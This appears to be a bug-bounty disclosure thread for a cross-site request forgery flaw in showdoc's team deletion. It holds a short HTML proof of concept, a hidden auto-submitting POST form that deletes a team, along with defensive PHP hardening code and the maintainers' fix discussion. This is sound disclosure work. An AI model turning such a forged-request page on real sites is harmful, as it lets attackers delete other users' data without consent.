Cross-Site Request Forgery (CSRF) in star7th/showdoc


Reported on

Nov 21st 2021


You set the strict flag only for one of your cookies named cookie_token but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name PHPSESSID don't have strict flag.

Proof of Concept

1. Replace 38046 with the team id in poc.html and click on the submit button.

3. After that, the team with id 38046 (or your replaced team id) will be deleted.


  <html>
    <body>
      <!-- hide the PoC page URL from the history entry -->
      <script>history.pushState('', '', '/')</script>
      <!-- the form action is left empty as it appears in the original report -->
      <form action="" method="POST">
        <input type="hidden" name="id" value="38046" />
        <input type="submit" value="Submit request" />
      </form>
    </body>
  </html>
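As an added example (not showdoc's own code), the server-side controls this report and the maintainer's later comment turn on, written in PHP: a SameSite=Strict session cookie so the browser will not attach PHPSESSID to a cross-site POST, regeneration of the session id on login so an old PHPSESSID does not survive, and a per-session CSRF token checked on the team-delete handler. Function names and the csrf_token field are assumptions.

```php
<?php
// Added example, not showdoc's code: hardening the PHP session cookie and
// protecting a state-changing endpoint (team deletion) against CSRF.

function startHardenedSession(): void
{
    // SameSite=Strict stops the browser from sending PHPSESSID with a
    // cross-site POST such as the poc.html form above.
    // The array form of session_set_cookie_params() needs PHP >= 7.3.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

function onLoginSuccess(int $userId): void
{
    // Issue a fresh session id so a PHPSESSID value created before login
    // (or before the fix was deployed) is not kept alive across logins.
    session_regenerate_id(true);
    $_SESSION['uid']  = $userId;
    $_SESSION['csrf'] = bin2hex(random_bytes(32));
}

function csrfTokenField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars($_SESSION['csrf'], ENT_QUOTES, 'UTF-8') . '">';
}

function requireValidCsrfToken(): void
{
    // Defence in depth: even if a browser ignores SameSite, the request must
    // carry a token that only a same-origin page could have read.
    $sent = (string)($_POST['csrf_token'] ?? '');
    if (!isset($_SESSION['csrf']) || !hash_equals($_SESSION['csrf'], $sent)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
}

// Hypothetical team-delete handler: session, token check, then authorisation.
startHardenedSession();
requireValidCsrfToken();
$teamId = (int)($_POST['id'] ?? 0);
// ... verify $_SESSION['uid'] may manage $teamId before deleting it ...
```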
We are processing your report and will contact the star7th/showdoc team within 24 hours. 13 days ago
star7th validated this vulnerability 12 days ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th confirmed that a fix has been merged on 654e87 12 days ago
star7th has been awarded the fix bounty
ItemModel.class.php#L1-L40 has been validated
12 days ago


I should fix it. You can test it

12 days ago


Hey chen

Not fixed, just like before (I logged out from the system and logged in again).

This is a fix commit that has a good fix for strict cookies:

Jamie Slome
11 days ago


@amammad 👋 it looks like a bug on our side caused the disclosure bounty to be set to $155. We have reset it to the value displayed at disclosure ($64). Apologies for the confusion or inconvenience.

10 days ago


@amammad You can close the browser and open it again. Because the previous phpsessid was automatically maintained by the program, you need to restart the browser to invalidate it. If you log in again, the phpsessid is not regenerated.

Jamie Slome
3 days ago


CVE published! 🎊